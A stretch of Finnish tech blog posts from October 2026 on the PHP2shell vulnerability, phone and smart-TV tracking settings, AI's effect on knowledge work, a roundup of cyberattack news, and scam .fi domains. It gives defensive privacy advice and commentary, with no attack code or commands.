PHP2shell pölyn laskeuduttua ja uusia ongelmia odotellessa

Vaarallisen PHP2shell-aukon paikkaaminen lyhyellä varoitusajalla aiheutti sydämentykytystä IT-henkilöstölle ja vei monelta työunet. Valtori sulki 21.10.2026 iltapäivällä monet julkishallinnon nettipalvelut varautuessaan päivityksiin. Yön aikana suurin osa on saatu tehtyä, mutta ei kaikkia. 

Maanmittauslaitos vielä varasivun varassa. Korjaus: alkoi toimia klo 13.30.

Iso kysymys on, kuinka kauan aukon vaikutukset näkyvät ja milloin kaikki on saatu päivitettyä. Ongelma on siinä, että aukko on vakava, eikä PHP:n vanhempiin versioihin tule virallista korjausta. Vanhojen palvelujen ohjelmisto joudutaan päivittämään kokonaan tai luottamaan toisten käyttäjien tekemiin paikkauksiin.

Eniten huolestuttaa kysymys siitä, onko tämä vasta jäävuoren huippu. Tekoäly on löytänyt suuren määärän aiemmin tuntemattomia haavoittuvuuksia. Tekoälyn käyttäjästä riippuu, raportoiko hän aukon korjaajille vai käyttääkö sitä rikollisiin tarkoituksiin. Ja kun aukkoja paljastuu vähän joka puolelta, teki hän kuinka tahansa, IT-henkilöstön kestävyys ja osaaminen ovat todella koetuksella.

Eikö ole vain hyvä, että tekoäly löytää aukkoja? Periaatteessa kyllä, mutta asia on monimutkainen.

PHP2shell-aukko (2 kpl) on vaarallinen, mutta se on ollut koodissa vuodesta 2012 lähtien. Kukaan tuskin olisi löytänyt sitä ilman tekoälyn apua. Onko aukko vaarallinen, jos yksikään ihminen ei pysty löytämään tai käyttämään sitä?

Entä missä kulkevat tekoälyn rajat? Jos tekoäly löytää aina vain uusia, entistä monimutkaisempia aukkoja, joita ainoastaan tekoäly itse pystyy käyttämään, niiden korjaaminen vaatii resursseja ja jopa vaarantaa palveluita, sillä kaikki eivät kuitenkaan asenna päivityksiä.

En sano, etteikö aukkoja pitäisi etsiä ja korjata, mutta nykyinen buumi huolestuttaa. Joka päivä tulee ilmoituksia uusista hyökkäyksistä ja ongelmista. Ne eivät kaikissa tapauksissa poista ongelmia vaan ovat itse ongelma. 

Aivan oikean näköinen lähettäjän sähköpostiosoite. Silti viesti on huijausta.

Itse sain eilen ensi kertaa kalasteluviestin, joka tuli Microsoftin omasta osoitteesta. Ei ollut kyrillisiä merkkejä eikä naamioitua osoitetta, lähettäjä oli saanut viestin menemään palvelinketjusta läpi aidolla osoitteella, vaikka epäonnistuneiden DKIM/SPF-tarkistusten olisi pitänyt pysäyttää huijaus ja siirtää viesti roskapostiin.

On parasta varautua siihen, että meno jatkuu koko loppuvuoden ajan. Käyttäjiltä se vaatii entistä suurempaa varovaisuutta palveluita käyttäessään.

Paljonko dataa on kohtuullista luovuttaa mainostajille?

Eilisen Hesarin artikkelin jälkeen moni pohtii, miten estää kaikki puhelimen urkintatoiminnot. EU:n kanta on, että tietosuoja on perusoikeus, ja kaikkeen tiedon keräämiseen on saatava täysin vapaaehtoinen suostumus. Edes huolimattomasti luettu (tai kokonaan ohitettu) käyttöehtosopimus ei riitä.

Asiassa on kuitenkin se toinen puoli. Jos sääntelemme liikaa ja vääriä asioita (evästeiden lupakyselyt!), aiheutamme vahinkoa omille yrityksille. Kaikkialla vaaditaan nyt digisuvereniteettia, vaikka ensin on kuormitettu yrityksiä lupaprosesseilla ja vaatimuksilla. GDPR:n piti lisätä luottamusta ja sitä kautta eurooppalaisten yritysten kilpailukykyä amerikkalaisia digijättejä vastaan. Niin ei ole käynyt, melkeinpä päinvastoin. Nyt EU itsekin on herännyt keventämään sääntelyä.

Ajankohtainen kysymys on suomalaisten medioiden vaatimukset saada seurata lukijoita vastineeksi uutisista. Olisi tietenkin kiva, jos sisältöä voitaisiin tuottaa nettiin vain yleisillä mainoksilla, jotka osaava käyttäjä pystyy blokkaamaan kokonaan - mutta ilmaista lounasta ei ole. Jos haluamme kotimaista sisältöä ja uutisia muualtakin kuin Yleisradiolta, tekijöiden on saatava rahaa. Kerättävien tietojen pitää olla kuitenkin kohtuullisia eikä niitä saa myydä kansainvälisille välittäjille, vaan käyttää mediayhtiön omiin tarkoituksiin.

Uutistuotanto ei ole mikään kultakaivos, päinvastoin. STT:tä ollaan ajamassa alas ja muidenkin medioiden uutistoimituksia supistetaan koko ajan. Yhdysvaltojen ja somen ääni nousee yhä suurempaan rooliin myös suomalaisten arjessa. Sekään ei ole hyvä. Satunnaiset EU:n miljardisakot ovat digijäteille halpa hinta tiedonvälityksen valta-asemasta.

Suomalaiset tarvitsevat kotimaista mediaa ja media tarvitsee suomalaisia lukijoita. Kun etu on yhteinen, järkevä kompromissi pitäisi löytyä.

Aiheeseen liittyen vielä jatkoa eiliseen uutiseen. Puhelimista löytyy asetuksia, joilla paikkatiedon keräämistä voi rajoittaa. Täydellinen estäminen on raju toimenpide, koska silloin menetetään karttapalvelut, valokuvien koordinaatit, joukkoliikenteen oppaat ja paljon muuta hyödyllistä. 

Vaikka GPS-sijainnin kytkisi pois käytöstä, käyttöjärjestelmä tunnistaa summittaisen sijainnin wifi-verkkojen perusteella. Siksi pitää katsoa sovelluskohtaista sijainnin käyttöä.

Kannattaa varmistaa, etteivät sovellukset saa sijaintitietoja taustalla toimiessaan. Sekä Androideissa että iPhoneissa sijainnin käyttöoikeuksia on helppo rajoittaa ohjelmakohtaisesti. Kaikissa sovelluksissa ei edes ole "Salli aina" -vaihtoehtoa, mutta jos on, se kannattaa siirtää kohtaan "Salli vain käytön aikana".

Sääsovelluksen oikeus sijaintiin (Android).

Vastaava asetus löytyy iOS-laitteista:

iOS.

Useinkaan ei tarvita tarkkaa sijaintia, vaan pelkkä aluekohtainen tieto riittää.

Toinen kriittinen tieto on laitekohtainen mainostunniste. Sitä voi vaihtaa arpomalla uuden tai poistaa kokonaan käytöstä. Jälkimmäisessä tapauksessa sekä Android että iOS nikottelevat ja varoittavat, miten mainokset muuttuvat sen myötä vähemmän kiinnostaviksi ja palvelut toimivat huonommin. Joopa joo. 

Mainosseurannan asetukset (Android).

iOS-laitteisiin tuli 14.5-versiossa paljon porua herättänyt "Pyydä ettei appi seuraa minua" -asetus. En ole vieläkään päässyt täysin perille sen toiminnasta. Applen oma teksti on koukeroinen: "Apple vaatii, että appikehittäjät pyytävät luvan ennen kuin seuraavat toimintaasi sellaisten appien ja sivustojen välillä, joita ne eivät omista, tarkoituksenaan kohdentaa sinulle mainontaa, mitata mainotaan liittyvää toimintaasi ja jakaa tietojasi tiedonvälittäjille..."

Vähän myöhemmin listataan erilaisia poikkeuksia, mitä seurannaksi ei lasketa. Ja lisäksi tämä: "Appikehittäjät ovat vastuussa valintojesi noudattamisesta." Siis mitä? Kyse ei olekaan teknisestä estosta vaan pelkästä pyynnöstä, jota huonomaineiset tekijät eivät varmasti noteeraa.

Asetukset eivät takaa yksityisyyttä. Siihen pystyy vain oma huolellisuus ja kurinalaisuus. Ei hauskoja pelejä eikä yhtään turhaa sovellusta puhelimeen. Erillinen hupipuhelin ei paljon auta, jos se kulkee työpuhelimen mukana. 

Salli appien pyytää seurata: OFF

Oletusarvona kaikki seuranta- ja mainostoiminnot ovat tietenkin käytössä, joten ne pitää itse käydä sammuttamassa. Eikä edes asetuksilla saa varmuutta yksityisyydestä. Sovelluksilla on omat kikkansa ja kyse on miljardibisneksestä, joten sinua seurataan joka tapauksessa jonkin verran.

Näistä asetuksista kannattaa kuitenkin aloittaa oman datajalanjäljen pienentäminen. 

Datapisteet paljastavat sinunkin elämäsi

Helsingin Sanomat julkaisi tänään kiinnostavan jutun datapisteistä, jotka kertovat paljon meistä ja elämästämme. "Tuossa kuljet sinä" osoittaa, miten kuka tahansa voi ostaa miljoonia datapisteitä - tai saada näytteitä niistä jopa ilmaiseksi.

Aihe ei ole uusi, mutta silti sen läväyttäminen lukijoiden eteen yllättää aina. Tiedämme, että meitä seurataan, mutta että näin tarkasti? Eikö GDPR suojele EU-kansalaisia?

Seuranta on pirullista, koska käyttäjä antaa siihen itse luvan hyväksyessään mobiilisovellusten käyttöehdot. Lisäksi kyse ei ole varsinaisista henkilötiedoista, koska ne myydään eteenpäin ilman henkilötietoja. Ongelmallisia niistä tulee vasta, kun tiettyä datalähdettä seuraamalla voidaan nähdä henkilön liikkuminen ja tiedoista päätellä henkilöllisyys.

Tietojen kerääminen ja niillä tehtävä bisnes eivät ole yllätys kenellekään asioita seuranneelle, mutta tietojen laajuus ja helppo saatavuus varmasti on. 

Pari viikkoa sitten ihmeteltiin, mistä tunkeutujat olisivat saaneet kansanedustajien asuntojen osoitteet, jos ne on rekistereissä suojattu - ehkä jopa turvakielloilla. No, esimerkiksi tästä. Kun tavoitteena ei ole murtautua juuri tietyn kansanedustajan kotiin, on helppo poimia aineistosta ne, jotka toistuvasti kulkevat asunnostaan eduskuntaan ja takaisin. Ajallinen vertailu vaaleja edeltävään aikaan auttaa erottelemaan edustajat eduskunnan virkamiehistä.

Pahinta on se, että poliitikkojen, virkamiesten, turvallisuusviranomaisten ja puolustusteollisuuden avainhenkilöiden liikkeet ovat myös jäljitettävissä. Virkapuhelimeen ei saa asentaa mitään turhaa, mutta jos henkilökohtainen puhelin kulkee mukana, se juoruaa tiedot joka tapauksessa. Varsinkin yritysten avainhenkilöiden kohdalla Venäjän uhka on konkreettinen.

Kaikkien mobiilisovellusten sijaintitiedon asetukset kannattaa tarkistaa.

Tietojen kerätys ei rajoitu nettijätteihin. Ne ovat melkeinpä pienempi paha, sillä Google ja Meta haluavat myydä sijaintisi palveluna mainostajille. Pelkkää sijaintidataa ei myydä, mikä rajoittaa rosvojen tai Venäjän kykyä hyötyä tiedoista. Pahimpia ovat harmittomalta tuntuvat sovellukset, kuten pelit ja apuohjelmat, jotka myyvät tiedot välittäjille, ja ne edelleen eniten tarjoavalle käyttötarkoituksesta piittaamatta.

Myös Suomen operaattorit myyvät vastaavaa dataa tutkimus- ja markkinointikäyttöön (Telia Crowd Insights). Tietoja käytettiin esimerkiksi korona-aikana. Operaattorit eivät kuitenkaan myy dataa eteenpäin kansainvälisille brokereille.

Mitä asialle voi tehdä? Tiedoilla käytävää kansainvälistä kauppaa on liki mahdotonta rajoittaa, joten on puututtava tiedon alkulähteeseen. Poista kaikki mobiilisovellukset, joita et oikeasti käytä. Ilmaiset nettipalvelut rahoittavat toimintaansa tietoja myymällä. Vielä parempi on käyttää palveluita tietokoneella mobiililaitteen sijaan. Pöytäkoneen tai läppärin liikkumista ei voi seurata.

Voit kieltää sijaintipalveluiden käytön joko puhelimen tai sovellusten tasolla, se auttaa myös vähentämään datajalanjälkeä. Mutta kartta- ja sääpalvelut ovat hyödyllisiä juuri siksi, että ne tietävät sijainnin. Data on arvokasta, niin käyttäjälle kuin palvelua tuottavalle yritykselle.

Tiedetään, että parin viikon kuluttua nyt vallalla oleva huoli ja närkästys ovat unohtuneet, ja mobiililaitteiden käyttö palaa taas entiselleen. Ne kun tekevät elämän niin paljon helpommaksi.

Sijaintitietojen lisäksi jokainen voi miettiä, mihin tekoälypalveluihin jaettavat tiedot aikanaan päätyvät. Houkutus on suuri, sillä mitä paremmin tekoäly tuntee käyttäjänsä, sitä parempia vastauksia se antaa. Ongelma on, että samalla monet muutkin oppivat tuntemaan käyttäjän, eikä heidän motiiveistaan ole mitään tietoa. Tänään tekoälylle jaettavat tiedot ovat huomisen paikkatietoja.

Lue myös: https://pjarvinen.blogspot.com/2026/10/paljonko-dataa-on-kohtuullista-luovutta.html

Sarjakuvakirja paljasti karun totuuden: Näin tekoäly muuttaa työelämää (kolumni)

Jatkossa meillä kaikilla on johtajan vastuu, mutta ei johtajan palkkaa, arvioi Petteri Järvinen.

Työpaikan taukohuoneen pöydällä lojui vanha sarjakuvakirja 20 vuoden takaa. Sillä oli osuva nimi: ”Työn iloa”

Kansikuvassa Virtanen kantaa otsa hiessä paperipinoa, samalla kun kaksi pomoa naureskelee taka-alalla kahvikuppi kädessä. He iloitsevat seuratessaan ahkeraa duunaria työssään.

Fyysisen työn aikakaudella johtajan ja duunarin roolit olivat selvät, mutta tekoälyn tullessa rajat hämärtyvät. Moni joutuu johtajaksi vastoin tahtoaan.

Tekoälyn luvataan tekevän työstä mielekkäämpää ja säästävän aikaa. Sama lupaus on kuultu useasti ennenkin. Ensin kyse oli mikrotietokoneista, sitten tietoverkoista, sen jälkeen älypuhelimista ja nykyään tekoälystä.

Harvalla työpäivä on kuitenkaan lyhentynyt, päinvastoin. Työvälineet kehittyvät ja nostavat työtehoa, mutta samalla työn vaativuus lisääntyy.

Kun kopiokoneelle ei tarvitse enää kävellä eikä arkistoon mennä penkomaan vanhoja papereita, koko työpäivä pitää käyttää tehokkaasti. Mobiililaitteissa työasiat tunkevat mukaan lounaalle ja kulkevat iltaisin kotiin. 

Aiempi ajankäytön huokoisuus on hävinnyt. Työpäivässä pitää ehtiä yhä enemmän, joten asioita tulee tehtyä moniajossa. Luemme sähköposteja, kuuntelemme Teamsia ja reagoimme erilaisiin hälytyksiin – kaikkea tätä yhtä aikaa.

Tekoäly tuskin muuttaa yleistä trendiä. Rutiinien automatisointi ei kevennä työtä, vaan lisää kiireen tuntua. Jäljelle jäävät työtehtävät ovat yhä vaativampia ja abstraktimpia.

Työhön liittyy asia, josta puhutaan liian vähän: konkreettisen tekemisen ilo.

Jokainen ohjelmoija tietää sen palkitsevan tunteen, kun itse koodattu ohjelma alkaa toimia, tai kun sinnikäs bugi viimein löytyy ja sen saa korjattua muutamalla klikkauksella.

Lääkäri iloitsee kuunneltuaan potilasta, selvitettyään häntä vaivaavan taudin ja löydettyään siihen parannuskeinon. Kirjoittaja hykertelee tyytyväisenä, kun tekstiin löytyy oikea rytmi, nasevia ilmauksia ja mieleen jäävä lopetus.

Itse tekemällä taidot pysyvät yllä ja kehittyvät. Tekoälyä käytettäessä varsinainen tekeminen ja sitä kautta oppiminen jää algoritmeille, eivätkä ne koe onnistumisen tunnetta tai oppimisen iloa.

Ohjelmoinnissa kehitys on edennyt pisimmälle. Vibe-koodaus on ainakin näennäisen tuottavaa, mutta jonkin aikaa sitä tehtyään ohjelmoija menettää otteensa koodaamiseen.

Jos työtä ei tee koko ajan, oma osaaminen vanhenee ja taidot ruostuvat. Tekoälyn tie on yksisuuntainen. 

Tietotyön tekijöistä tulee jatkossa tekoälyn orkestraattoreita. He ohjaavat työnkulkuja, valvovat tehtävien suorittamista, tarkistavat tuloksia ja kuluttavat aikaansa jonninjoutavissa Teams-suunnittelupalavereissa. Lisäksi he kantavat vastuun kaikesta.

Agenttien toiminnassa on asioita, joihin ei voi itse vaikuttaa ja joita ei voi hallita. On oltava koko ajan tarkkana ja elettävä jatkuvassa epävarmuudessa. Jos automaatio pettää, seuraukset näkyvät laajalle.

Muiden valvominen ja vastuun kantaminen toisten työstä on henkisesti raskasta. Juuri siksi Virtasen johtajille maksettiin hyvin.

Jatkossa meillä kaikilla on johtajan vastuu, mutta ei johtajan palkkaa.

Miltä tekoälyn komentaminen näyttää CV:ssä? Ei juuri miltään.

Arkkitehti voi mainita suunnitelleensa hienon rakennuksen, koodari toteuttaneensa hienon tietojärjestelmän, mutta tekoälyllä teetetystä työstä ei jää merkintöjä CV:hen.

Onneksi on kesämökit! Kun oma työ on abstraktia puuhastelua, kesämökillä voi vielä toteuttaa itseään. Saa rakentaa, nikkaroida ja korjata. Lopputulos on konkreettinen, kaikkien nähtävissä oleva ja aidosti hyödyllinen.

Harmi vain, ettei vapaa-ajalla rakentamista voi merkitä CV:hen.

Vanhan viisauden mukaan ne, jotka osaavat, tekevät. Jotka eivät osaa, opettavat. Jotka eivät osaa edes opettaa, suunnittelevat opettamista ja laativat strategioita.

Tekoäly on jatkumoa Peterin periaatteeseen: työntekijä nousee organisaatiossa pätemättömyytensä tasolle.

Tekoälyn ansiosta entistä nopeammin ja entistä korkeammalle.

Julkaistu Tivi-lehdessä 10/2026

Nyt on kyberpiru merrassa

Maailmalta tulvii nyt uutisia kyberhyökkäyksistä. Ja nyt vihdoin kyse on todellisista hyökkäyksistä, ei mitään palveluestoista. Vaikuttaa siltä, että tekoäly-yhtiöiden varoitukset ovat toteutumassa. Uudet mallit ovat juuri niin tehokkaita, kuin on väitetty, ja juuri siksi väärissä käsissä vaarallisia.

Erikoisin oli Ranskassa tapahtunut hyökkäys, jossa kauppaketjujen kylmälaitteiden Danfossin etäohjattavia AK-SM 800A termostaatteja kytkettiin pakkasen sijaan +50 C tasolle viikonlopun aikana. Pakasteet sulivat ja osa kylmälaitteista syttyi tuleen ylikuumenemisen vuoksi. Hollannissa kyberhyökkäys Ahold Delhaize -keskusliikkeeseen pakotti sen sulkemaan kauppoja. On vielä epäselvää, ovatko tapaukset yhteydessä toisiinsa. Ranskan tilanteesta yhteenvetoa: https://thehackernews.com/2026/10/attackers-heat-french-supermarket.html.

Tanskan väestötietojärjestelmän tiedot kaapattiin tuntemattoman tahon toimesta. Fehmarnbetin tunnelityömaa on pysäytetty rakennusyhtiöön kohdistuneen kyberhyökkäyksen vuoksi. Japanissa on käynnissä kiristysohjelmahyökkäysten aalto. Kohteina on liikenne, kaupat, terveydenhuolto, pankit ja julkinen hallinto. FT:n mukaan hallituspuolueen edustaja on kutsunut tilannetta kyberhätätilaksi.

Osa hyökkäyksistä ja murroista perustuu alkeellisiin virheisiin. Danfossin hallintatunnus oli admin ja salasanana johdettu päivämäärästä. Tanskan tapauksessa salasana oli 123456. 

Onko tapausten kasaantuminen vain sattumaa? Vai ovatko taustalla tekoälyn löytäneet rikollisryhmät? 

Kuin kirsikaksi kakun päälle Anthropic julkaisi vielä varoituksen siitä, että jo puolen vuoden päästä saatamme nähdä tekoälymadon, joka kuljettaa mukanaan omaa päättelykonetta ja pystyy leviämään haavoittuvasta nettilaitteesta toiseen. ABC:n uutinen ja Anthropicin oma tiedote avaavat asiaa tarkemmin.

Kun joku aina kysyy, eikö karannutta tekoäly voi pysäyttää katkaisemalla koneesta sähköt, niin tässä on vastaus: jos tekoäly on levinnyt maailmalle, se ei ole enää yhdessä koneessa eikä edes konesalissa, vaan kaikkialla. Itsestään tällaista ei tapahdu, mutta joku sen tekee ennen pitkää kuitenkin.

Viimeistään silloin meillä on todellinen kyberpiru merrassa. 

<ironia>Mutta ei hätää, sehän on vain kielimalli... </ironia>

Lisäys 14.10.2026 - joitakin uutisia. Tämä alkaa tuntua siltä, mistä kyberturvallisuusluennoilla on jo vuosia varoitettu. 

• TFG London (Phase Eight, Hobbs, Whistles muotiketjut): https://www.bleepingcomputer.com/news/security/tfg-london-cyberattack-disrupts-systems-at-hobbs-and-whistles-retailers/
• Tangerhütte (kunta Saksassa): https://darkwebinformer.com/german-municipality-targeted-in-suspected-ai-driven-zero-day-attack/ 
• Asos-verkkokaupan tietomurto ja asiakastietojen varastaminen: https://www.bbc.com/news/articles/c3zxjdw5ywgpo (röyhkeä tapaus, sillä rosvot tiedottivat varkaudesta Asosin oman mobiilisovelluksen kautta!)
• Koreassa 16 rahoitusalan yritystä hakkerointien kohteena https://www.fsc.go.kr/eng/pr010101/87928
• Asus-reitittimissä vanhentuneita varmenteita, joiden vuoksi salattu DNS lakkasi toimimasta (ja sen mukana netin käyttö)

Ja 21.10.2026 vielä lisää uskomattomia tapauksia:

• Intialainen Emudhra varmennepalvelu myynyt yli vuoden varmenteita, joiden väärentäminen olisi lastenleikkiä, koska yksityisessä avaimessa oli vain 1-3 numeroa (piti olla 116). Vastaa Tanskan tapausta, missä salasana väestörekisteriin oli 123456.
• Kaksi vakavaa PHP-haavoittuvuutta: PHP2Shell (CVE-2026-109618 ja CVE-2026-109619). Traficom varoittaa ja Valtori ajanut alas julkishallinnon sivuja kunnes päivitetty ohjelma on saatu asennettua. Valitettavasti tieto haavoittuvuudesta vuoti julkisuuteen ennen kuin korjausta oli vielä saatavilla.

Kirjamessut: 500 Internal Server Error.

Yksi suljetuista sivuista on Kirjamessut, joiden pitäisi alkaa huomenna 22.10.2026. Ei olisi pahempaan aikaan voinut saattua.

Erikoista kyllä kaikki tapaukset ovat hyvin erilaisia, suurin osa vain huolimattomuudesta johtuvia. Onko kasaantuminen vain sattumaa, vai onko tekoälyä käytetty kokeiluun ja haavoittuvuuksien etsintään?

EU epäilee Booking.comia verkkoturvallisuuden laiminlyönnistä.

Ylen uutinen kertoo Booking.com olevan epäiltynä tietoturvan laiminlyönnistä. Ihmiset ovat kertoneet saaneensa kalasteluviestejä todellisista varauksista ja Traficom varoitti asiasta viime viikolla. Itse olen aina käyttänyt kilpailevaa palvelua Hotels.com enkä ole koskaan saanut yhtään kalasteluviestiä. 

LG-television vakoilu on yhä arvoitus

Televisioiden vakoilutoiminnoista on uutisoitu jo useaan kertaan, mutta silti äskettäinen LG-kohu yllätti. Salakuunteleeko televisio puhetta ja lähettää sitä jonnekin netin kautta? Seuraako TV mitä ohjelmia sillä katsotaan?

Asian selvittäminen ei ole helppoa. Kävin tarkistamssa oman 65-tuumaisen LG Oled-mallin asetuksia ja yllätyin, miten paljon niitä löytyi. Ilmeisesti asetukset ovat lisääntyneet firmware-päivitysten myötä, mikä on tosi ovelaa valmistajalta. Uusia vakoilutoimintoja voidaan tuoda käytännössä salaa, sillä katsoja ei tutki valikoita eikä osaa kytkeä toimintoja pois päältä.

LG:n tapauksessa seuranta-asiat on sijoitettu (piilotettu?) System > Additional Settings -alakohtaan ja jotain on myös AI Recommendation -listassa. Osa niistä oli päällä, osa ei. Osa asetuksista on selkeitä, osa ihan outoja. Onneksi valikon vieressä on pieni kuvausteksti.

Home Promotion?

Home Settings on helppo tapaus. Sen Promotion liittynee aloitusnäyttöön, ei omaan kotiin. Kaikista asetuksista ei tiedä, onko niillä mitään vaikutusta Suomen oloissa.

Onkohan sisältösuositus käytössä Suomessa?

Selkeitä mainosasetuksia ovat ainakin AD Tracking ja Live Plus.

Live Plus on selvää urkintaa.

Live Plus oli omassa televisiossani päällä, vaikka ohje kertoo sen tarjoavan "enhanced viewing experience and personalised services". Tämä kannattaa tietenkin poistaa.

Sitten on vielä Limit AD Tracking sekä siihen liittyvä tunniste, jonka voi resetoida.

Reset AD ID.

Hieman yllättää, että televisiossa on samanlaiset yksilölliset laitetunnisteet kuin mobiililaitteissa. Tämänkin käytön voi sammuttaa.

Varmuuden vuoksi sammutin myös HbbTV-toiminnon, joka mahdollistaa mm. äänestämisen joissakin ohjelmissa.

Parin viikon ajan avasin television Maikkarin tai Nelosen kanavalle ja annoin sen olla päällä ilman, että kukaan katseli tai vaihteli kanavia. Neljän tunnin jälkeen television uniajastin sammutti laitteen itsestään. 

Reitittimen laskuri on epätieteellinen, koska se interpoloi vuorokausikäyrät jatkuviksi. Oikeasti niiden pitäisi olla mittauspisteiden kohdalla pylväitä. 

Vuorokauden lähetysmäärä kellonajan perusteella.

Vuorokausinäyttö kertoo, että dataa siirtyy eniten heti päälle kytkemisen jälkeen, sitten siirtomäärät tippuvat (jokaisessa vuorokausikäyrässä sama kuvio). Hyvä puoli on, ettei televisio siirtänyt mitään silloin, kun se oli sammutettuna.

Television lähettämän datan määrä päivittäin.

Datasiirto 10.10. näyttää tavallista pienemmältä, koska televisio oli auki hetken toisen vuorokauden puolelle asti.

Mitä tästä voi sitten päätellä? Neljän tunnin aikana televisio lähettää noin kaksi megatavua dataa. Siitä osa menee Youtubelle, Applelle, Netflixille ja Amazonille, mutta suurin osa siirtyy salattuna jonnekin, mitä ei voi nähdä (TLS/SSL). Kyse voi olla sovellusten päivitystarkistuksista tai vastaavista, mutta määrä tuntuu silti paljolta. Latausliikenne on vain vähän lähetystä suurempaa, mikä tuntuu oudolta. Yhtään varsinaista sovelluspäivityksen latausta ei osunut ajanjaksoon.

LG:llä on oma tili, jota televisiossa ei otettu käyttöön. Itselläni on kyllä LG-tili toisesta vanhasta laitteesta johtuen, mutta sille ei televisiossa ollut kirjoitettu salasanaa, eikä se voinut siten olla käytössä.

Jää arvailujen varaan, mitä dataa televisio lähettää. Ainakaan näytön kuvat eivät voi olla kyseessä, koska silloin datasiirto olisi paljon suurempi. Tai ehkä kuvia otetaan vain kanavia vaihdeltaessa? Pitää vielä jatkaa kokeiluja simuloimalla todellista katselua.

Kaikkein suurin kysymys jää kuitenkin ilmaan: mitä tällä datalla tehdään? Miten televisio voi kytkeä tiedot käyttäjään, jos tämä ei rekisteröi tiliä, ja jos tiedot ovat anonyymejä niin missä LG niitä hyödyntää? Suomen TV-mainoksiin niillä ei voi vaikuttaa eikä ainakaan tv-katsojalle näytetä suoraan nettimainoksia. Jos käyttää Youtubea tai Netflixiä television kautta, tiedot voivat vaikuttaa johonkin, mutta ainakin Netflix saa tiedot katselustaan joka tapauksessa.

LG-television salainen elämä jää siis vieläkin salaisuudeksi. Ja juuri se on ärsyttävää: olemme kuin koekaniineita, jotka tietävät olevansa seurannan kohteita, mutta eivät tiedä mitä tiedoilla tehdään.

Katso myös: https://pjarvinen.blogspot.com/2026/09/kuka-liikkuu-verkossasi-kolumni.html

Lisäys 16.10.2026

Kanavien vaihtelu ei juurikaan näytä vaikuttavan lähtevän datan määrään. Avasin television klo 21 ja vaihtelin kanavia muutaman tunnin ajan, aivan kuin televisiota katseltaisiin. Sen jälkeen 4 tunnin uniajastin jäi odottamaan aktivoitumistaan. Datasiirron määrissä ei juuri näy eroa.

Kanavasurffailua ja sitten 4 h uniajastin.

Seuraavana iltana tein saman, mutta sammutin television itse neljän tunnin käytön jälkeen. Tämäkään ei juuri näkynyt datasiirrossa.

Neljä tuntia kanavasurffailua.

Entä jos palauttaisin urkinta-asetukset takaisin käyttöön? Poistin mainosrajoituksen (Limit AD Tracking: OFF) ja Live-seurannan (Live Plus: ON). Sitten taas neljä tuntia satunnaista kanavien vaihtelua.

Lupa seurata.

Näilläkään luvilla dataliikenne ei juuri muuttunut (kuvassa näkyvä All clients on virhe, koska näyttö ei päivity täysin asetuksen vaihdon jälkeen). Kanavien vaihtelu lisää saapuvan datan määrää. 

Toistaiseksi johtopäätös on, ettei ainakaan tämä LG 65-tuumainen malli lähetä tietoa mainostajille Suomen olosuhteissa. Dataa kuitenkin liikkuu, varsinkin televisioon päin (downstream), eikä sen käyttötarkoitus ole tiedossa. 

Lisäyksiä:

Seuraavissa kuvissa aina seuranta päällä (Live plus: ON ja Limit Ad Tracking: OFF).

Kanavana MTV:

Datasiirto 19.10.2026, kanavana MTV.

Huomio kiinnittyy 155 megatavun latausmäärään.

Seuraava päivä, samat parametrit:

Datasiirto 21.10.2026, kanavana MTV.

Jälleen suuri määrä ladattua dataa (nyt 306 Mt).

Seuraava päivä, mutta nyt kanavana Nelonen:

Datasiirto 22.10.2026, kanavana Nelonen.

Sattumaa tai ei, nyt latausmäärä vain 335 kilotavua (tuhannesosa edellisen päivän lukemasta Maikkarin kanavalla). 

Kesäajan loppu (Nelonen).

Edellisten tapaan mainosseuranta sallittu, kanavana Nelonen. Aamuyöllä klo 4 pieni datasiirto molempiin suuntiin juuri, kun kesäaika loppuu. Mitä mahtoi sammutettu televisio silloin tehdä?

Lukemissa ei tunnu olevan mitään logiikkaa, joten arvoitus sen kuin syvenee.

Domain-nimillä huijaaminen - pitäisikö välittäjällä olla enemmän vastuuta? Uusia ideoita kaivataan

Huijarit käyttävät fi-loppuisia domain-nimiä, koska ne herättävät suomalaisissa luottamusta. Äskettäin tekstiviestillä lähetettiin "muistutusta" vuosittaisesta hammastarkastuksesta. Jos ajan halusi perua, piti klikata viestissä olevaa osoitetta omaneuvola.fi. 

Huijaus ei ollut kovin onnistunut. Siinä mainittiin vain viikonpäivä (maanantai), ei päivämäärää eikä kellonaikaa. Lisäksi sanoissa oli kaksi kirjoitusvirhettä. Omaneuvola.fi oli varattu pari päivää aikaisemmin suomalaisen Zoner-palvelun kautta. 

Traficomin rekisteriin oli ilmoitettu Neuvolab Oy -nimisen yrityksen oikeat tiedot, kuten Y-tunnus ja kotiosoite (Tampereella), joskin Mäkitie oli kirjoitettu epäilyttävästi Maekitie.

Ilmeisesti ao. yrityksellä ei ole mitään tekemistä huijauksen kanssa. Joku on vain käyttänyt sen nimeä ja etsinyt todelliset yhteystiedot. Mikäli Zonerilla on ylipäätään kukaan katsonut tunnusta, Omaneuvola.fi voisi hyvinkin mennä Neuvolab Oy:n palveluna.

Tästä herää kysymys, pitäisikö verkkotunnusvälittäjän varmistaa ilmoitetut yhteystiedot? Miten domain oli maksettu, laskuttamalla vai tilisiirtona? Ehkä laskutustiedot olivat yhtä lailla virheellisiä, joten Zoner ei tule koskaan saamaan rahojaan. Eipä tunnus vuodeksi juuri mitään maksakaan.

Pitäisikö tunnuksen välittäjän odottaa, kunnes lasku on maksettu ennen tunnuksen avaamista? Kaikki uudet ideat ovat tarpeen, ja niitähän Suomessa onkin viime aikoina ollut kiitettävästi (SMS SenderID, huijauspuheluiden tunnistus, OP:n tilisiirtojen esto jos puhelu on käynnissä, huijausdomainin poisto DNS:stä ym).

Voisiko tuoreet linkit suodattaa kokonaan pois? Domain-varauksia voi lukea API-rajapinnan kautta ja kuka tahansa voi bongata niistä huijauksia. Sata viimeksi varattua näkyy tästä. Domaineja voi tarkastella vaikka postinumeron tai yrityksen Y-tunnuksen mukaan. Neuvolabin tunnuksella ei ole muita varauksia.

FI-domainit Y-tunnuksen mukaan.

Kannattaa muuten tarkistaa ajoittain omankin yrityksesi nimissä rekisteröidyt tunnukset.

Toinen idea: voisiko teleoperaattori lisätä tekstiviestiin varoituksen, jos siinä linkitetään alle viikko sitten vuodeksi varattuun domain-nimeen? Huijausdomainit toimivat vain muutaman päivän ennen paljastumistaan, ja sen jälkeen kyberturvallisuuskeskus saa ne suljettua. Tätä pitäisi hyödyntää.

Tekstiviesti voisi näyttää vaikka tältä:

** TIETOTURVAVAROITUS ** Viestissä oleva linkki viittaa juuri avattuun domain-osoitteeseen. Varmista linkin aitous. 

===

